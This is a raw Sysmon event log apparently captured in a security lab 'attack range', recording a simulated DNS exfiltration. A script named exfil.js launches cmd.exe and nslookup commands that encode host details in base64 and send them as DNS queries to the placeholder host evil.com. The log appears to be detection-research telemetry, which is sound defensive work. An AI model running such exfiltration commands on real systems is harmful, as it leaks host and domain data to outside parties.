AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52319-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000043902Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:03.151{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C82C23A346E15B99F3C755DC4EFCCA2,SHA256=0E2CE062670A7AADA5EE8AEB964C5D4B7E236838F5A4E7BDC9282134AD538A9B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.987{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A3-629A-863D-000000005F02}5936C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.955{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A3-629A-853D-000000005F02}2388C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.955{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.955{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.955{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.955{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.955{2E1864BB-17A1-629A-783D-000000005F02}55527352C:\Windows\System32\WScript.exe{2E1864BB-17A3-629A-853D-000000005F02}2388C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.962{2E1864BB-17A3-629A-853D-000000005F02}2388C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldfh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000193870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.955{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyzw.tmpMD5=7564BBC357DA8472A939C2EE79A792F5,SHA256=2DBE8B361679ED57394E9EFB1DF40D5559A7E60F6F1F0A6E2904E60B52067C41,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.908{2E1864BB-17A3-629A-833D-000000005F02}53524552C:\Windows\system32\conhost.exe{2E1864BB-17A3-629A-843D-000000005F02}6220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.908{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.908{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.908{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.908{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.908{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A3-629A-843D-000000005F02}6220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.908{2E1864BB-17A3-629A-823D-000000005F02}21287236C:\Windows\system32\cmd.exe{2E1864BB-17A3-629A-843D-000000005F02}6220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.914{2E1864BB-17A3-629A-843D-000000005F02}6220C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A3-629A-823D-000000005F02}2128C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyzw.tmp 2>&1 10341000x8000000000000000193861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.871{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A3-629A-833D-000000005F02}5352C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.871{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A3-629A-833D-000000005F02}5352C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.871{2E1864BB-17A3-629A-833D-000000005F02}53524552C:\Windows\system32\conhost.exe{2E1864BB-17A3-629A-823D-000000005F02}2128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.855{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A3-629A-833D-000000005F02}5352C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.841{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A3-629A-823D-000000005F02}2128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.841{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.841{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.841{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.841{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.841{2E1864BB-17A1-629A-783D-000000005F02}55527224C:\Windows\System32\WScript.exe{2E1864BB-17A3-629A-823D-000000005F02}2128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.850{2E1864BB-17A3-629A-823D-000000005F02}2128C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyzw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000193850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.841{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllhwg.tmpMD5=13DAE9C9CF6ADD4F8F46BEAD8C3CC212,SHA256=2DEC16DD493989E01C6A3048EE3C7ECCED532832FC7BFFA4BF3297D9C89C0784,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.793{2E1864BB-17A3-629A-803D-000000005F02}17006424C:\Windows\system32\conhost.exe{2E1864BB-17A3-629A-813D-000000005F02}4832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 